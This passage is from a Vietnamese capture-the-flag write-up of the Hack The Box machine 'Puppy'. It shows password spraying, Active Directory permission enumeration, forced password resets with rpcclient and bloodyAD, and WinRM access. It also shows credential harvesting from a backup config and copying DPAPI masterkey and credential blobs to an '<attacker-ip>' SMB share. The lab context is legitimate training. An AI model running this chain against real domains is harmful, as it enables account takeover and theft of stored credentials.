SMB 10.10.11.70 445 DC [-] PUPPY.HTB\steph.cooper:Steve2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\steph.cooper:ILY2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\steph.cooper:ILY2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\steph.cooper_adm:JamieLove2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\steph.cooper_adm:HJKL2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\steph.cooper_adm:HJKL2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\steph.cooper_adm:Antman2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\steph.cooper_adm:Antman2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\steph.cooper_adm:Steve2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\steph.cooper_adm:Steve2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\steph.cooper_adm:ILY2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\steph.cooper_adm:ILY2025! STATUS_LOGON_FAILURE 
1
[+] PUPPY.HTB\ant.edwards:Antman2025!

Vậy là đã xác định được password của user ant.edwardsAntman2025!.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
> bloodhound-python -dc DC.PUPPY.HTB -u 'ant.edwards' -p 'Antman2025!' -d PUPPY.HTB -c All -o bloodhound_results.json -ns 10.10.11.70
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: puppy.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_
ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: DC.PUPPY.HTB
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: DC.PUPPY.HTB
INFO: Found 10 users
INFO: Found 56 groups
INFO: Found 3 gpos
INFO: Found 3 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC.PUPPY.HTB
INFO: Done in 00M 20S

image.png

image.png

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
> bloodyAD --host 10.10.11.70 -d PUPPY.HTB -u Ant.Edwards -p 'Antman2025!' get writable --detail
distinguishedName: CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=PUPPY,DC=HTB
url: WRITE
wWWHomePage: WRITE
distinguishedName: CN=Anthony J. Edwards,DC=PUPPY,DC=HTB
thumbnailPhoto: WRITE
pager: WRITE
mobile: WRITE
homePhone: WRITE
userSMIMECertificate: WRITE
msDS-ExternalDirectoryObjectId: WRITE
msDS-cloudExtensionAttribute20: WRITE
msDS-cloudExtensionAttribute19: WRITE
msDS-cloudExtensionAttribute18: WRITE
msDS-cloudExtensionAttribute17: WRITE
msDS-cloudExtensionAttribute16: WRITE
msDS-cloudExtensionAttribute15: WRITE
msDS-cloudExtensionAttribute14: WRITE
msDS-cloudExtensionAttribute13: WRITE
msDS-cloudExtensionAttribute12: WRITE
msDS-cloudExtensionAttribute11: WRITE
msDS-cloudExtensionAttribute10: WRITE
msDS-cloudExtensionAttribute9: WRITE
msDS-cloudExtensionAttribute8: WRITE
msDS-cloudExtensionAttribute7: WRITE
msDS-cloudExtensionAttribute6: WRITE
msDS-cloudExtensionAttribute5: WRITE
msDS-cloudExtensionAttribute4: WRITE
msDS-cloudExtensionAttribute3: WRITE
msDS-cloudExtensionAttribute2: WRITE
msDS-cloudExtensionAttribute1: WRITE
msDS-GeoCoordinatesLongitude: WRITE
msDS-GeoCoordinatesLatitude: WRITE
msDS-GeoCoordinatesAltitude: WRITE
msDS-AllowedToActOnBehalfOfOtherIdentity: WRITE
msPKI-CredentialRoamingTokens: WRITE
msDS-FailedInteractiveLogonCountAtLastSuccessfulLogon: WRITE
msDS-FailedInteractiveLogonCount: WRITE
msDS-LastFailedInteractiveLogonTime: WRITE
msDS-LastSuccessfulInteractiveLogonTime: WRITE
msDS-SupportedEncryptionTypes: WRITE
msPKIAccountCredentials: WRITE
msPKIDPAPIMasterKeys: WRITE
msPKIRoamingTimeStamp: WRITE
mSMQDigests: WRITE
mSMQSignCertificates: WRITE
userSharedFolderOther: WRITE
userSharedFolder: WRITE
url: WRITE
otherIpPhone: WRITE
ipPhone: WRITE
assistant: WRITE
primaryInternationalISDNNumber: WRITE
primaryTelexNumber: WRITE
otherMobile: WRITE
otherFacsimileTelephoneNumber: WRITE
userCert: WRITE
homePostalAddress: WRITE
personalTitle: WRITE
wWWHomePage: WRITE
otherHomePhone: WRITE
streetAddress: WRITE
otherPager: WRITE
info: WRITE
otherTelephone: WRITE
userCertificate: WRITE
preferredDeliveryMethod: WRITE
registeredAddress: WRITE
internationalISDNNumber: WRITE
x121Address: WRITE
facsimileTelephoneNumber: WRITE
teletexTerminalIdentifier: WRITE
telexNumber: WRITE
telephoneNumber: WRITE
physicalDeliveryOfficeName: WRITE
postOfficeBox: WRITE
postalCode: WRITE
postalAddress: WRITE
street: WRITE
st: WRITE
l: WRITE
c: WRITE

distinguishedName: CN=Adam D. Silver,CN=Users,DC=PUPPY,DC=HTB
ms-net-ieee-80211-GroupPolicy: CREATE_CHILD
nTFRSSubscriptions: CREATE_CHILD
classStore: CREATE_CHILD
ms-net-ieee-8023-GroupPolicy: CREATE_CHILD
shadowFlag: WRITE
shadowExpire: WRITE
shadowInactive: WRITE
shadowWarning: WRITE
shadowMax: WRITE
shadowMin: WRITE
shadowLastChange: WRITE
loginShell: WRITE
unixHomeDirectory: WRITE
gecos: WRITE
gidNumber: WRITE
uidNumber: WRITE
msSFU30NisDomain: WRITE
msSFU30Name: WRITE
labeledURI: WRITE
userPKCS12: WRITE
preferredLanguage: WRITE
thumbnailLogo: WRITE
thumbnailPhoto: WRITE
middleName: WRITE
departmentNumber: WRITE
carLicense: WRITE
jpegPhoto: WRITE
audio: WRITE
pager: WRITE
mobile: WRITE
secretary: WRITE
homePhone: WRITE
manager: WRITE
photo: WRITE
roomNumber: WRITE
mail: WRITE
textEncodedORAddress: WRITE
uid: WRITE
userSMIMECertificate: WRITE
msDS-preferredDataLocation: WRITE
msDS-ObjectSoa: WRITE
msDS-SourceAnchor: WRITE
msDS-KeyCredentialLink: WRITE
msDS-ExternalDirectoryObjectId: WRITE
msDS-AssignedAuthNPolicy: WRITE
msDS-AssignedAuthNPolicySilo: WRITE
msDS-SyncServerUrl: WRITE
msDS-CloudAnchor: WRITE
msDS-cloudExtensionAttribute20: WRITE
msDS-cloudExtensionAttribute19: WRITE
msDS-cloudExtensionAttribute18: WRITE
msDS-cloudExtensionAttribute17: WRITE
msDS-cloudExtensionAttribute16: WRITE
msDS-cloudExtensionAttribute15: WRITE
msDS-cloudExtensionAttribute14: WRITE
msDS-cloudExtensionAttribute13: WRITE
msDS-cloudExtensionAttribute12: WRITE
msDS-cloudExtensionAttribute11: WRITE
msDS-cloudExtensionAttribute10: WRITE
msDS-cloudExtensionAttribute9: WRITE
msDS-cloudExtensionAttribute8: WRITE
msDS-cloudExtensionAttribute7: WRITE
msDS-cloudExtensionAttribute6: WRITE
msDS-cloudExtensionAttribute5: WRITE
msDS-cloudExtensionAttribute4: WRITE
msDS-cloudExtensionAttribute3: WRITE
msDS-cloudExtensionAttribute2: WRITE
msDS-cloudExtensionAttribute1: WRITE
msDS-GeoCoordinatesLongitude: WRITE
msDS-GeoCoordinatesLatitude: WRITE
msDS-GeoCoordinatesAltitude: WRITE
msDS-AllowedToActOnBehalfOfOtherIdentity: WRITE
msDS-PrimaryComputer: WRITE
msTSSecondaryDesktops: WRITE
msTSPrimaryDesktop: WRITE
msDS-LastKnownRDN: WRITE
isRecycled: WRITE
msPKI-CredentialRoamingTokens: WRITE
msDS-NcType: WRITE
msTSLSProperty02: WRITE
msTSLSProperty01: WRITE
msTSManagingLS4: WRITE
msTSLicenseVersion4: WRITE
msTSExpireDate4: WRITE
msTSManagingLS3: WRITE
msTSLicenseVersion3: WRITE
msTSExpireDate3: WRITE
msTSManagingLS2: WRITE
msTSLicenseVersion2: WRITE
msTSExpireDate2: WRITE
msDS-HABSeniorityIndex: WRITE
msTSManagingLS: WRITE
msTSLicenseVersion: WRITE
msTSExpireDate: WRITE
msTSProperty02: WRITE
msTSProperty01: WRITE
msTSInitialProgram: WRITE
msTSWorkDirectory: WRITE
msTSDefaultToMainPrinter: WRITE
msTSConnectPrinterDrives: WRITE
msTSConnectClientDrives: WRITE
msTSBrokenConnectionAction: WRITE
msTSReconnectionAction: WRITE
msTSMaxIdleTime: WRITE
msTSMaxConnectionTime: WRITE
msTSMaxDisconnectionTime: WRITE
msTSRemoteControl: WRITE
msTSAllowLogon: WRITE
msTSHomeDrive: WRITE
msTSHomeDirectory: WRITE
msTSProfilePath: WRITE
msDS-FailedInteractiveLogonCountAtLastSuccessfulLogon: WRITE
msDS-FailedInteractiveLogonCount: WRITE
msDS-LastFailedInteractiveLogonTime: WRITE
msDS-LastSuccessfulInteractiveLogonTime: WRITE
msDS-SupportedEncryptionTypes: WRITE
msDS-AuthenticatedAtDC: WRITE
msDS-PhoneticDisplayName: WRITE
msDS-PhoneticCompanyName: WRITE
msDS-PhoneticDepartment: WRITE
msDS-PhoneticLastName: WRITE
msDS-PhoneticFirstName: WRITE
msDS-SecondaryKrbTgtNumber: WRITE
msRADIUS-SavedFramedIpv6Route: WRITE
msRADIUS-FramedIpv6Route: WRITE
msRADIUS-SavedFramedIpv6Prefix: WRITE
msRADIUS-FramedIpv6Prefix: WRITE
msRADIUS-SavedFramedInterfaceId: WRITE
msRADIUS-FramedInterfaceId: WRITE
unixUserPassword: WRITE
msPKIAccountCredentials: WRITE
msPKIDPAPIMasterKeys: WRITE
msPKIRoamingTimeStamp: WRITE
msDS-SourceObjectDN: WRITE
msDRM-IdentityCertificate: WRITE
msDS-AllowedToDelegateTo: WRITE
msIIS-FTPDir: WRITE
msIIS-FTPRoot: WRITE
lastLogonTimestamp: WRITE
msDS-Site-Affinity: WRITE
msDS-Cached-Membership-Time-Stamp: WRITE
msDS-Cached-Membership: WRITE
msCOM-UserPartitionSetLink: WRITE
mS-DS-CreatorSID: WRITE
mS-DS-ConsistencyChildCount: WRITE
mS-DS-ConsistencyGuid: WRITE
otherWellKnownObjects: WRITE
dSCorePropagationData: WRITE
accountNameHistory: WRITE
proxiedObjectName: WRITE
msRASSavedFramedRoute: WRITE
msRASSavedFramedIPAddress: WRITE
msRASSavedCallbackNumber: WRITE
msRADIUSServiceType: WRITE
msRADIUSFramedRoute: WRITE
msRADIUSFramedIPAddress: WRITE
msRADIUSCallbackNumber: WRITE
msNPSavedCallingStationID: WRITE
msNPCallingStationID: WRITE
msNPAllowDialin: WRITE
mSMQSignCertificatesMig: WRITE
mSMQDigestsMig: WRITE
mSMQDigests: WRITE
mSMQSignCertificates: WRITE
uSNSource: WRITE
terminalServer: WRITE
isCriticalSystemObject: WRITE
altSecurityIdentities: WRITE
lastKnownParent: WRITE
aCSPolicyName: WRITE
servicePrincipalName: WRITE
userSharedFolderOther: WRITE
userSharedFolder: WRITE
url: WRITE
otherIpPhone: WRITE
ipPhone: WRITE
partialAttributeDeletionList: WRITE
lockoutTime: WRITE
userPrincipalName: WRITE
legacyExchangeDN: WRITE
assistant: WRITE
otherMailbox: WRITE
mhsORAddress: WRITE
primaryInternationalISDNNumber: WRITE
primaryTelexNumber: WRITE
otherMobile: WRITE
otherFacsimileTelephoneNumber: WRITE
userCert: WRITE
showInAddressBook: WRITE
partialAttributeSet: WRITE
wellKnownObjects: WRITE
sIDHistory: WRITE
dynamicLDAPServer: WRITE
systemFlags: WRITE
fSMORoleOwner: WRITE
desktopProfile: WRITE
groupPriority: WRITE
groupsToIgnore: WRITE
sAMAccountType: WRITE
wbemPath: WRITE
division: WRITE
defaultClassStore: WRITE
controlAccessRights: WRITE
logonCount: WRITE
groupMembershipSAM: WRITE
lmPwdHistory: WRITE
accountExpires: WRITE
comment: WRITE
rid: WRITE
adminCount: WRITE
revision: WRITE
operatorCount: WRITE
profilePath: WRITE
userParameters: WRITE
supplementalCredentials: WRITE
securityIdentifier: WRITE
primaryGroupID: WRITE
preferredOU: WRITE
pwdLastSet: WRITE
ntPwdHistory: WRITE
seeAlso: WRITE
preferredDeliveryMethod: WRITE
destinationIndicator: WRITE
registeredAddress: WRITE
internationalISDNNumber: WRITE
x121Address: WRITE
facsimileTelephoneNumber: WRITE
teletexTerminalIdentifier: WRITE
telexNumber: WRITE
telephoneNumber: WRITE
physicalDeliveryOfficeName: WRITE
postOfficeBox: WRITE
postalCode: WRITE
postalAddress: WRITE
businessCategory: WRITE
description: WRITE
title: WRITE
ou: WRITE
o: WRITE
street: WRITE
st: WRITE
l: WRITE
c: WRITE
serialNumber: WRITE
sn: WRITE
objectCategory: WRITE
sAMAccountName: WRITE
objectSid: WRITE
nTSecurityDescriptor: WRITE
instanceType: WRITE
cn: WRITE
objectClass: WRITE
OWNER: WRITE
DACL: WRITE
...

Tìm kiếm sâu hơn và chính xác hơn.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
> bloodyAD --host 10.10.11.70 -d PUPPY.HTB -u Ant.Edwards -p 'Antman2025!' get writable --detail | grep -A 20
"distinguishedName: CN=.*DC=PUPPY,DC=HTB" | grep -B 20 "WRITE"
distinguishedName: CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=PUPPY,DC=HTB
url: WRITE
wWWHomePage: WRITE
distinguishedName: CN=Anthony J. Edwards,DC=PUPPY,DC=HTB
thumbnailPhoto: WRITE
pager: WRITE
mobile: WRITE
homePhone: WRITE
userSMIMECertificate: WRITE
msDS-ExternalDirectoryObjectId: WRITE
msDS-cloudExtensionAttribute20: WRITE
msDS-cloudExtensionAttribute19: WRITE
msDS-cloudExtensionAttribute18: WRITE
msDS-cloudExtensionAttribute17: WRITE
msDS-cloudExtensionAttribute16: WRITE
msDS-cloudExtensionAttribute15: WRITE
msDS-cloudExtensionAttribute14: WRITE
msDS-cloudExtensionAttribute13: WRITE
msDS-cloudExtensionAttribute12: WRITE
msDS-cloudExtensionAttribute11: WRITE
msDS-cloudExtensionAttribute10: WRITE
msDS-cloudExtensionAttribute9: WRITE
msDS-cloudExtensionAttribute8: WRITE
msDS-cloudExtensionAttribute7: WRITE
--
distinguishedName: CN=Adam D. Silver,CN=Users,DC=PUPPY,DC=HTB
ms-net-ieee-80211-GroupPolicy: CREATE_CHILD
nTFRSSubscriptions: CREATE_CHILD
classStore: CREATE_CHILD
ms-net-ieee-8023-GroupPolicy: CREATE_CHILD
shadowFlag: WRITE
shadowExpire: WRITE
shadowInactive: WRITE
shadowWarning: WRITE
shadowMax: WRITE
shadowMin: WRITE
shadowLastChange: WRITE
loginShell: WRITE
unixHomeDirectory: WRITE
gecos: WRITE
gidNumber: WRITE
uidNumber: WRITE
msSFU30NisDomain: WRITE
msSFU30Name: WRITE
labeledURI: WRITE
userPKCS12: WRITE
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
> bloodyAD --host 10.10.11.70 -d PUPPY.HTB -u Ant.Edwards -p 'Antman2025!' get writable --detail | grep -E "di
stinguishedName: CN=.*DC=PUPPY,DC=HTB" -A 10
distinguishedName: CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=PUPPY,DC=HTB
url: WRITE
wWWHomePage: WRITE
distinguishedName: CN=Anthony J. Edwards,DC=PUPPY,DC=HTB
thumbnailPhoto: WRITE
pager: WRITE
mobile: WRITE
homePhone: WRITE
userSMIMECertificate: WRITE
msDS-ExternalDirectoryObjectId: WRITE
msDS-cloudExtensionAttribute20: WRITE
msDS-cloudExtensionAttribute19: WRITE
msDS-cloudExtensionAttribute18: WRITE
msDS-cloudExtensionAttribute17: WRITE
--
distinguishedName: CN=Adam D. Silver,CN=Users,DC=PUPPY,DC=HTB
ms-net-ieee-80211-GroupPolicy: CREATE_CHILD
nTFRSSubscriptions: CREATE_CHILD
classStore: CREATE_CHILD
ms-net-ieee-8023-GroupPolicy: CREATE_CHILD
shadowFlag: WRITE
shadowExpire: WRITE
shadowInactive: WRITE
shadowWarning: WRITE
shadowMax: WRITE
shadowMin: WRITE

Ta có thể thấy người dùng Adam D. Silver có quyền ghi(write permission)

https://www.hackingarticles.in/forcechangepassword-active-directory-abuse/

image.png

Sử dụng rpcclient để thay đổi mật khẩu.

1
2
3
> rpcclient -U 'puppy.htb\Ant.Edwards%Antman2025!' 10.10.11.70
rpcclient $> setuserinfo ADAM.SILVER 23 Password@987
rpcclient $>
1
2
3
> nxc smb 10.10.11.70 -u 'ADAM.SILVER' -p 'Password@987'
SMB 10.10.11.70 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:PUPPY.HTB) (signing:True) (SMBv1:False)
SMB 10.10.11.70 445 DC [+] PUPPY.HTB\ADAM.SILVER:Password@987
1
2
3
4
5
> crackmapexec winrm 10.10.11.70 -u 'ADAM.SILVER' -p 'Password@987' -d PUPPY.HTB
HTTP 10.10.11.70 5985 10.10.11.70 [*] http://10.10.11.70:5985/wsman
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
 arc4 = algorithms.ARC4(self._key)
WINRM 10.10.11.70 5985 10.10.11.70 [+] PUPPY.HTB\ADAM.SILVER:Password@987 (Pwn3d!)

Phương pháp thay đổi mật khẩu bằng bloodyAD và trả về kết quả chi tiết(verbose).

1
2
> bloodyAD -u ant.edwards -p 'Antman2025!' -d puppy.htb --dc-ip 10.10.11.70 set password adam.silver 'Password@987'
[+] Password changed successfully!

Sử dụng impacket-changepasswd để thay đổi mật khẩu bằng phương pháp khác.

1
2
3
4
5
6
> impacket-changepasswd puppy.htb/adam.silver@10.10.11.70 -newpass 'Password@987' -altuser puppy.htb/ant.edwards -altpass Antman2025! -reset
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Setting the password of puppy.htb\adam.silver as puppy.htb\ant.edwards
[*] Connecting to DCE/RPC as puppy.htb\ant.edwards
[*] Password was changed successfully.
[!] User no longer has valid AES keys for Kerberos, until they change their password again.

Truy cập ban đầu (Initial Access)

Chúng ta đã thay đổi được mật khẩu, có thể kết nối qua WinRM và sẽ tiến hành kết nối.

1
> evil-winrm -i 10.10.11.70 -u 'ADAM.SILVER' -p 'Password@987'
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\adam.silver\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\adam.silver\Desktop> dir

 Directory: C:\Users\adam.silver\Desktop
 
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2/28/2025 12:31 PM 2312 Microsoft Edge.lnk
-ar--- 5/17/2025 9:56 PM 34 user.txt

*Evil-WinRM* PS C:\Users\adam.silver\Desktop>

Đặc quyền leo thang (Privilage Escalation)

Sử dụng BloodHound để quét(scan)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
> ntpdate -u 10.10.11.70 | bloodhound-python -dc DC.PUPPY.HTB -u 'ADAM.SILVER' -p 'Password@987' -d PUPPY.HTB -c All -o bloodhound_results.json -ns 10.10.11.70
CLOCK: step_systime: Operation not permitted
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: puppy.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_
ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: DC.PUPPY.HTB
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: DC.PUPPY.HTB
INFO: Found 10 users
INFO: Found 56 groups
INFO: Found 3 gpos
INFO: Found 3 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC.PUPPY.HTB
INFO: Done in 00M 20S

image.png

Kết nối qua Evil-WinRM(adam.silver) và thực hiện liệt kê(enumeration).

1
2
3
4
5
6
7
8
9
10
11
*Evil-WinRM* PS C:\Backups> dir
 Directory: C:\Backups
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 3/8/2025 8:22 AM 4639546 site-backup-2024-12-30.zip
*Evil-WinRM* PS C:\Backups> download site-backup-2024-12-30.zip

Info: Downloading C:\Backups\site-backup-2024-12-30.zip to site-backup-2024-12-30.zip

Info: Download successful!
*Evil-WinRM* PS C:\Backups>

Trong thư mục Backups, có tệp site-backup-2024-12-30.zip, chúng ta sẽ tải về và kiểm tra nội dung bên trong.

1
2
3
4
5
6
> ll
total 20
drwxrwxr-x 6 kali kali 4096 Dec 31 1979 assets
drwxrwxr-x 2 kali kali 4096 Dec 31 1979 images
-rw-rw-r-- 1 kali kali 7258 Dec 31 1979 index.html
-rw-r--r-- 1 kali kali 864 Dec 31 1979 nms-auth-config.xml.bak
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
> cat nms-auth-config.xml.bak
<?xml version="1.0" encoding="UTF-8"?>
ldap-config>
 <server>
 <host>DC.PUPPY.HTB</host>
 <port>389</port>
 <base-dn>dc=PUPPY,dc=HTB</base-dn>
 <bind-dn>cn=steph.cooper,dc=puppy,dc=htb</bind-dn>
 <bind-password>ChefSteph2025!</bind-password>
 </server>
 <user-attributes>
 <attribute name="username" ldap-attribute="uid" />
 <attribute name="firstName" ldap-attribute="givenName" />
 <attribute name="lastName" ldap-attribute="sn" />
 <attribute name="email" ldap-attribute="mail" />
 </user-attributes>
 <group-attributes>
 <attribute name="groupName" ldap-attribute="cn" />
 <attribute name="groupMember" ldap-attribute="member" />
 </group-attributes>
 <search-filter>
 <filter>(&(objectClass=person)(uid=%s))</filter>
 </search-filter>
</ldap-config>

Tìm thấy mật khẩu và tên người dùng trong tệp nms-auth-config.xml.bak.

  • name: steph.cooper
  • password : ChefSteph2025!

Kiểm tra khả năng kết nối qua WinRM.

1
2
3
4
5
> crackmapexec winrm 10.10.11.70 -u 'steph.cooper' -p 'ChefSteph2025!' -d PUPPY.HTB
HTTP 10.10.11.70 5985 10.10.11.70 [*] http://10.10.11.70:5985/wsman
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
 arc4 = algorithms.ARC4(self._key)
WINRM 10.10.11.70 5985 10.10.11.70 [+] PUPPY.HTB\steph.cooper:ChefSteph2025! (Pwn3d!)

Có thể sử dụng Evil-WinRM để kết nối và thực hiện liệt kê(enumeration).

1
> evil-winrm -i 10.10.11.70 -u 'steph.cooper' -p 'ChefSteph2025!'
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplem
ented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-co
mpletion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\steph.cooper\Documents>
*Evil-WinRM* PS C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials> dir C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\

 Directory: C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect
 
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---s- 2/23/2025 2:36 PM S-1-5-21-1487982659-1829050783-2281216199-1107

*Evil-WinRM* PS C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect> cd S-1-5-21-1487982659-1829050783-2281216199-1107
*Evil-WinRM* PS C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107> ls -force

 Directory: C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107

Mode LastWriteTime Length Name
---- ------------- ------ ----
-a-hs- 3/8/2025 7:40 AM 740 556a2412-1275-4ccf-b721-e6a0b4f90407
-a-hs- 2/23/2025 2:36 PM 24 Preferred

*Evil-WinRM* PS C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107> copy "C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107\556a2412-1275-4ccf-b721-e6a0b4f90407" \\<attacker-ip>\share\masterkey_blob
*Evil-WinRM* PS C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107>
1
2
3
4
5
6
7
8
9
*Evil-WinRM* PS C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials> ls -Force

 Directory: C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials

Mode LastWriteTime Length Name
---- ------------- ------ ----
-a-hs- 3/8/2025 7:54 AM 414 C8D69EBE9A43E9DEBF6B5FBD48B521B9

*Evil-WinRM* PS C:\Users\steph.cooper\Documents> copy "C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials\C8D69EBE9A43E9DEBF6B5FBD48B521B9" \\<attacker-ip>\share\credential_blob

Tìm thấy tệp masterkey (khóa mã hóa) và đã sao chép về máy của chúng ta.

Cũng đã sao chép credential blob (tệp chứa thông tin đăng nhập của người dùng, như mật khẩu hoặc token).

  • Masterkey: Khóa bí mật được sử dụng trong mã hóa và giải mã DPAPI.
  • Credential blob: Thông tin đăng nhập đã lưu của người dùng (mật khẩu hoặc token).

Sử dụng thông tin đăng nhập được bảo vệ bởi DPAPI để giải mã(decrypt) mật khẩu ngoại tuyến(offline).

Khởi động SMB server để sao chép các tệp này. Trong quá trình thực hiện, SMB server cần được bật và các tệp Masterkey cùng Credential blob sẽ được lưu vào thư mục chia sẻ(share) mà chúng ta đã tạo.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
> mkdir -p ./share
> impacket-smbserver share ./share -smb2support
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.11.70,60046)
[*] AUTHENTICATE_MESSAGE (\,DC)
[*] User DC\ authenticated successfully
[*] :::00::aaaaaaaaaaaaaaaa
[*] Connecting Share(1:IPC$)
[*] Connecting Share(2:share)
[*] Disconnecting Share(1:IPC$)
[*] Disconnecting Share(2:share)
[*] Closing down connection (10.10.11.70,60046)
[*] Remaining connections []
[*] Incoming connection (10.10.11.70,60098)
[*] AUTHENTICATE_MESSAGE (\,DC)
[*] User DC\ authenticated successfully
[*] :::00::aaaaaaaaaaaaaaaa
[*] Connecting Share(1:share)
[*] Disconnecting Share(1:share)
[*] Closing down connection (10.10.11.70,60098)
[*] Remaining connections []

Sử dụng script DPAPI để giải mã(decrypt) tệp masterkey_blob.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
> ll
total 8
-rwxrwxr-x 1 kali kali 414 Mar 8 10:54 credential_blob
-rwxrwxr-x 1 kali kali 740 Mar 8 10:40 masterkey_blob

